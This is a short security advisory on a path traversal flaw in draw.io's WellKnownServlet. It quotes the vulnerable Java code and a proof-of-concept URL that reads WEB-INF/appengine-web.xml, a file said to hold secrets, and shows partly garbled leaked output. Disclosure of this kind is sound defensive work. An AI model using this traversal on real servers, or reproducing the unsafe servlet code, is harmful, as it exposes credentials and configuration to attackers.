Path Traversal in WellKnownServlet
Discription

# Description

The `WellKnownServlet` is vulnerable to path traversal.
This allows reading local files.
For example the files in `WEB-INF` that contain secrets and API keys can be read.

https://github.com/jgraph/drawio/blob/v18.0.4/src/main/java/com/mxgraph/online/WellKnownServlet.java#L40-L66

“`java
String uri = request.getRequestURI().replace(“/.”, “/”);

if (uri.toLowerCase().contains(“.json”))
{
response.setContentType(“application/json”);
}

// Serve whatever was requested from .well-known
try (InputStream in = getServletContext().getResourceAsStream(uri))
{
if (in == null)
{
response.sendError(404);
return;
}

byte[] buffer = new byte[8192];
int count;

while ((count = in.read(buffer)) > 0)
{
response.getOutputStream().write(buffer, 0, count);
}

response.getOutputStream().flush();
response.getOutputStream().close();
}
“`

# Proof of Concept

Access the following URL (replace “ with the actual host of the web application).

“`txt
/.well-known/…/WEB-INF/appengine-web.xml
“`

This will disclose the contents of `appengine-web.xml`:

“`xml
truefalsejava8F11
“`

Back to Main

Subscribe for the latest news: